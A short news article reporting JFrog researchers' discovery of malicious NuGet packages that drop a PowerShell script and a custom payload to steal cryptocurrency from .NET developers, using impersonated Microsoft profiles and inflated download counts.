AdminNew reports claim that .NET developers are being attacked by malware designed to steal their cryptocurrency.
Cybersecurity researchers at JFrog recently discovered an active campaign where malicious packages were uploaded to a NuGet repository for .NET developers to download and use.
Once activated, the packages download and run a PowerShell dropper called init.ps1, which changes the endpoint settings to allow unlimited PowerShell script execution.
Non-standard loads
The researchers suggest that this feature alone was enough of a red flag to warrant elimination of the package: “Such behavior is extremely rare outside of malicious packages, especially given the “Unlimited” Execution policy, which should trigger a red flag immediately.”
Still, if allowed to run unrestricted, the package will download and execute a “completely custom executable payload” for the Windows environment, the researchers added. Analysts say this is also rare behavior as hackers usually use open source tools to cut down time.
To build their legitimacy, the hackers did two things. First, they rewrote their NuGet repository profiles to impersonate (opens in a new tab) Microsoft developers working on the .NET NuGet package manager.
Secondly, they inflated the number of downloads of malicious packages to obscenely high levels to give the impression that the packages were legitimate and downloaded hundreds of thousands of times. While that may still be the case, the researchers said it’s more likely they used bots to artificially inflate the numbers to surprise developers.
“The top three packages were downloaded an incredible number of times – this may indicate that the attack was very successful, infecting a large number of machines,” JFrog security researchers said. “However, this is not a fully reliable indicator of attack success because the attackers may have automatically inflated the number of downloads (using bots) to make the packages look more legitimate.”
By: Beeping Computer (opens in a new tab)
